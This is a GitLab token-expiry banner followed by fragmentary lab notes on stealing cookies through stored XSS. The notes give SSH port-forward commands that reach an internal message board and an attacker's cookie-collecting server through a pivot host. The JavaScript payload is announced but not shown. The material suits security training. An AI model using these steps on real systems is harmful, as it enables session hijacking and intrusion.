GitLab now enforces expiry dates on tokens that originally had no set expiration date. Those tokens were given an expiration date of one year later. Please review your personal access tokens, project access tokens, and group access tokens to ensure you are aware of upcoming expirations. Administrators of GitLab can find more information on how to identify and mitigate interruption in our documentation.
. This can also be done by creating a listening port on "jmp/pivot" system (IE Lin_Priv system) and having the call back go to its internal IP on some random port.
----
If using Local Port Fordwards to access internal web server, keep in mind of your "Targets" routing capabilities. The IP you place in the "document.location"
needs to be accessible to the "Target". See example below.
ssh demo1@<DEMO_NET_FLOAT> -L 1111:10.208.50.42:80 # Gives Op Station access to internal Website via jmp system.
ssh demo1@<DEMO_NET_FLOAT> -L 2222:10.208.50.61:80 # Gives Op Station access to "Our Malicious Webserver" to capture the cookies.
. Utilize the message board hosted on the Demo-Web_Exploit_upload: `http://127.0.0.1:1111/chat/messageb.php`
. On the message board enter a name and then input the following javascript in the message field and submit.
** Since your "Op Station" can not directly access the 10.208.50.61 system to send your cooking too, you would have to build a tunnel to make that connection.
From a operational standpoint, the target or targets of the Stored XSS need to be able to route to the system that is "collecting" the Cookies.
